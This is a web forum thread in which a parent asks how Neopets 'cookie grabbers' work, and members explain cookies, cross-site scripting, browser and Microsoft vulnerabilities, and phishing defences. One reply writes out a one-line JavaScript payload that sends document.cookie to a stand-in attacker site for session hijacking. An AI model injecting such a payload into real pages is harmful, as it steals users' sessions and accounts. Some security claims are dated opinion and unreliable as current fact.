I have found this site to be very helpful in the past and hoping the people on here can help me out with a few questions since people here seem more knowlegable about these type of things than I probably every will.

To begin I am not looking for coding for one of these (cookie grabbers). I am just looking for some information about them. I have tried looking these things up on the internet, but keep getting sent to Neopets PetPages or places that just post the coding. I am looking for more detailed info about these things for two reasons. 1. to better protect my information from them and 2. basic curiosity of how things work.

Can someone explain exactly what these things can and cannot do? I know in basic it takes a copy of cookies from your computer and stores them else where, where the person using the cookie grabber, then can retrieve your personal information (account name, passwords, etc).

I would like to know things more specific like: Do you specify a specific website(s) that you want the cookies from or will it take them all? Does the CG have to be on the same domain as the cookie it's wanting to 'steal'? Do browsers like Firefox, IE, Safari, Opera protect from these being 'stolen', if so how other than constantly cleaning out your cookie? And what type of coding can these be written in (PHP, Java, CSS, etc)?

You don't have to go into technical jargon to explain just basic lame man's terms will work.

If anyone can answer this it would be much appricated. Any information or even links to places I can find the information would be great.

I have read through the rules and I am pretty sure this isn't breaking any since I am just asking for this thing being described and not requesting the code for one.

I don't know much about this myself but, this article:

http://pcworld.about.com/magazine/2002p043id73828.htm

seems to imply what I suspected, that IE is the only vulnerable browser or at least the most vulnerable browser but that other MS software, if left unpatched, can also be vulnerable.

I would think if you regularly use live update or have automatic updates turned on and functioning properly, that this isn't much of a concern.

However, I would recommend to anyone concerned about this and the myriad other types of security risks associated with MS software, to avoid using these products as much as possible by using different software for anything that opens you to the web.

okay first of all... a cookie is a reference of a reference if done properly. There are many different ways of implementing a cookie, however they are usually done in a way that they are being processed in multiple ways. First the cookie is placed onto the computer from the website. it is then stored onto the computer for a certain length of time... if the programmer did not specify the length of time the default is the "session" or the length that you currently have that browser window open... Now the browser is supposed to check its "cookie jar" periodically and delete any expired cookies but that is getting off track.
After a cookie is placed onto a persons computer it can then be accessed and read by other programs if the program means to. The processing and security within the cookie is usually very minimal so programs that are purposefully attempting to read cookies will usually find that its pretty simple, for that reason a GOOD programmer will not rely on the built in security of the cookie and when they write the cookie they will not assign the actual physical details of what they are trying to store, but rather a reference number (id #) usually of where it can be found on the server. Yes, there are ways around this extra step, but if someone could get to this point, there really isnt much you are going to be able to do anyway besides block all content.

On that note, it is possible to prevent a cookie being written to your system without prompting you, or there is a setting that will only allow 3rd party cookies to be written on with a confirmation... As for protecting your computer, I wouldnt fully suggest that you disable your cookie allowance, however I would just monitor where you give out your sensitive information, and I have even gone as far as emailing the administrators of a website to ask them how cookies were stored and what security measures were put into place.


I hope everythign works out for the best and feel free to continue to ask questions if anything I said didnt make sense

Do you mean local programs that do this, or something on a website?

If the latter, what you're talking about is cross-site scripting (XSS). In an XSS attack, a malicious user inserts some Javascript into an innocent web page, which then has access to the cookies stored for that domain. This Javascript then transfers the cookie data to the malicious user's server. The simplest way to do this would be:
window.location.href = 'http://www.malloryssite.com/cookiestealer.php?' + document.cookie;That PHP script could then store the cookies (which would likely contain some session identification) somewhere, or even use them automatically to hijack the user's currently-running session on the targetted website and thus take control of his/her account.

Yes, Twey, that is what I was refering to, however Zomb was asking about how to help him better understand the workings of cookies and that is what I was trying to do... If you need anything else zomb let us know

Zomb was asking about how to help him better understand the workings of cookiesNo, s/he was asking about the workings of "cookie grabbers," a vague term that could apply to a program, script or even a person. The question:
Does the CG have to be on the same domain as the cookie it's wanting to 'steal'?lead me to believe that XSS was what was being discussed here.
Do browsers like Firefox, IE, Safari, Opera protect from these being 'stolen', if so how other than constantly cleaning out your cookie?No, browsers cannot protect you from XSS attacks. The responsibility is that of the site from which the page vulnerable to script insertion was served.
And what type of coding can these be written in (PHP, Java, CSS, etc)?The server-side part can be written in almost any language. The client-side can be written in anything the browser will execute that can access cookies, including but not limited to Javascript, VBScript, Java, and Flash. Javascript is the most common by far, however, since almost all browsers support it and it is the easiest to inject, as it requires no external files.

I have two domains, and would like cookies to be available for both. Is there any way I could use this to my advantage?
sorta off topic and going the opposite direction, but related...

No, that's a completely different situation :)

The user would have to be logged in to both domains and on a page on each, as well as having JS enabled.

or use an iframe to force them to be on both domains. Not reliable though as would require some javascript

I'd like to take this opportunity to bring this topic back into focus from my perspective for the OP:

1 ) Apparently all browsers are vulnerable to XSS cookie grabbing. Choose wisely those sites that you set up secure accounts with.

2 ) Equally apparent is that in unpatched editions of MS software, there are additional threats from direct assaults on your cookies. Protect yourself from these by using alternative software or ensuring that you always have the latest updates for your MS software.

3 ) There are vulnerabilities inherent in MS software other than direct cookie theft. It is a little like the little Dutch boy with his finger in the dike, only the dike is crumbling all around him. This isn't entirely MS's fault. It is mostly just that their software is the most widely used, and therefore also the most widely hacked. Most notable exception, Active X. This is a security nightmare of MS's own doing.

I would add to this:

4 ) Be on guard for phishing scams. Never use the link in an email that appears to be from a trusted site to update or give out any personal information. Always log on to the site itself using its known address before entering any passwords or updating or confirming information. Often if you carefully check the site address in such emails, it will become apparent that it isn't the site that the email claims to be from, simply a similar looking address.

That pretty much sums it up, although I don't entirely agree with:
This isn't entirely MS's fault.If Microsoft's software is only the most often cracked because it's the most popular, how do you explain the fact that Apache is by far the most popular webserver package -- and yet IIS is still the most frequently compromised?

Also, with regards to #4, Firefox 2.0 plans to implement some revolutionary new anti-phishing technology. Just how good it actually is remains to be seen -- I don't think it's been added to the version on the build tree yet.

Also, with regards to #4, Firefox 2.0 plans to implement some revolutionary new anti-phishing technology. Just how good it actually is remains to be seen -- I don't think it's been added to the version on the build tree yet.
It might have been, or at least I remember reading a review somewhere. Though anti-phishing is a standard feature for quite a few newer browsers(ex.IE7), which is always good.

That does help a lot. I have my mother on a mac so she's not using IE, she's using Safari and Firefox. I am more concern with her computer than mine because my little brother plays Neopets, which is where I first heard about this thing when he called me asking me what one of those things actually were.

I was concerned about his NP account because he spends so much time on it, but more concerned about my mother's banking account and things like that. Why I asked if the coder had to specify the cookie it wanted or had to be on that domain. So all I really had to worry about was my little bro's account and not my mother's.

I do have them cleaning cookies before he goes near the site or any NP related site. I also have required him to go to sites that are largely 'known' and not questionable.

Being mainly a Commercial Artist coding is something I do on the side so other coding I'm not much into, but I figured someone here would help me... So thank for not letting me down. Also thanks for all the information.

Oh and it's she for those who were referring :)

If Microsoft's software is only the most often cracked because it's the most popular, how do you explain the fact that Apache is by far the most popular webserver package -- and yet IIS is still the most frequently compromised?

It's a love/hate relationship for most hackers. They love to hack MS because they hate them. :rolleyes: I didn't mean to imply that the MS software is the industry leader in all categories, just that its overall prominence and its (deserved I think) reputation for shoot from the hip business practices (something I didn't mention before) has made it a bit of a favorite target.

For an XSS attack to take place, the site whose account of yours the attacker wishes to steal must be vulnerable. Let's face it, that's probably not going to happen on a bank website, which probably employs the best security experts around and keeps user interaction to a minimum possible for just such a reason :)
Of course, if you run an ActiveX control by clicking the little "yes" box when it asks permission, or IE is "persuaded" to run one without your knowledge, all the cookies from any site available can be taken. In fact, your entire computer can be taken over, keyloggers installed, all sorts of digital unpleasantries watching your every move.

Which is why you should avoid Internet Explorer. :)

He shouldn't be in too much trouble so long as he stays off IE (or at least disables ActiveX, although this includes more innocent components like XMLHttpRequest which could add functionality to a website) doesn't download programs except from those trusted sites you mentioned. If possible, I'd advise you to use the Mac for any business or financial work where sensitive data is being handled.


I didn't mean to imply that the MS software is the industry leader in all categoriesOh no, I didn't mean to imply you did. According to Netcraft (http://news.netcraft.com/archives/web_server_survey.html), Apache has over twice the market share of IIS. Even factoring in the let's-all-kill-Microsoft aspect, statistically Apache should receive at least the same number of security hits. However, looking at data for Apache 2.0 (http://secunia.com/product/73/) and IIS5 (http://secunia.com/product/39/) (there isn't a lot of data on either IIS6 or Apache 2.2 yet; two holes for Apache, three for IIS) we see can see that IIS has fewer actual advisories than Apache, a pretty sure sign that people haven't been searching for them so much, but also that what vulnerabilities were disclosed are considerably higher in criticality than those for Apache, which says to me, especially coupled with the relative lack of advisories, that either the security researchers got really lucky, or IIS is full of holes and the only reason so few were found is that most people were concentrating on Apache.

Right. Ok, thanks.

... huh?

That's a bit of a non-sequitur. Did you post in the right thread?

Ha, sorry. I posted having not seen the next page, about the response to my question before.
Yes, non-sequitor. :p
Carry on....